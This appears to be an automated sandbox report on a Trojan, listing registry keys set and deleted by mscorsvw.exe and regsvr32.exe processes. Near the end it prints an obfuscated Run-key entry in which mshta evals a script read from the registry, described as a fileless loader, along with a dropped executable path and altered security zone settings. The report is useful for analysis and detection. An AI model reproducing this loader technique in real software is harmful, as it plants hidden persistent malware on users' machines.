[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B BF 44 4A 6C FA 52 B2 10 EC 05 A2 E2 3F 31 5A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 B7 83 50 EF BF ED 23 59 86 2D 41 F4 1A 34 C4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4D 6D 00 FD F4 D5 28 53 D9 CB 8D 45 C2 6C 6D"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "C8 72 10 C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]

The process mscorsvw.exe:3484 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 AE 1D EF 6C 2D 88 D8 76 C0 1D 10 D7 D2 5E E6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 00 35 84 DF A4 99 38 7B 60 2A D5 07 4D C9 EB"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "2C BB 9A C0 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 38 81 A1 6C C7 C9 19 E6 64 2E 68 D9 A2 6B 20"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "44 C8 29 C1 AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 14 B1 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 27 1B FE ED E6 AE 9E E4 D6 4F B9 AA 92 DA 70"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 CD 79 1E C6 15 7A 89 BF B0 25 7A 2D 1E 6F F6"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 25 DD 5E 6E 4B B4 85 04 B3 3B 26 95 D9 C9 97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1A 26 E3 BF AB F3 D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process regsvr32.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 61 CF CB 61 1C 26 88 90 15 8E 95 57 35 E8 DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process regsvr32.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:nGqU8fhUg5=Fh69Ffs;r49L=new ActiveXObject(WScript.Shell);fZR7QqjRn3=8Sz6E;I2tCE2=r49L.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);zOYw9cby=4io;eval(I2tCE2);jXFqs0MMa=Ua;o."

This policy Run entry is a fileless loader: at logon mshta.exe evaluates the inline javascript: URI, which reads the script body stored in the registry value HKLM\SOFTWARE\e307dfcb0a\5119f545 (set by the same process) through WScript.Shell.RegRead and passes it to eval(), so no script file is written to disk. The value is truncated in this listing.

[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"

[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "865"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK<ÃŽ«8GÝt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«hܰremIèÑyDÈ6 ˆŸG”ô?1ËœußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨Æ’@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûЦYÙ]½oes¶‹´"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = 